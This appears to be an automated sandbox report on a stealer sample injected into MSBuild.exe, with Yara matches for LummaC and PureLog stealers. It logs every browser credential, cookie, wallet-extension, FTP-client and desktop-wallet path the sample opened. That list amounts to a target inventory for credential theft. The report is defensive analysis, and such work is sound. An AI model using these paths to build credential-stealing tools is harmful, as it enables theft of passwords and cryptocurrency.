Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: MSBuild.exe, 00000002.00000002.2147987348.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 86KZvDaOZR.exe, 00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS			Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 3948, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 86KZvDaOZR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.86KZvDaOZR.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2009495788.0000000000182000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\86KZvDaOZR.exe

Code function: 0_2_6CF1A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CF1A0C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
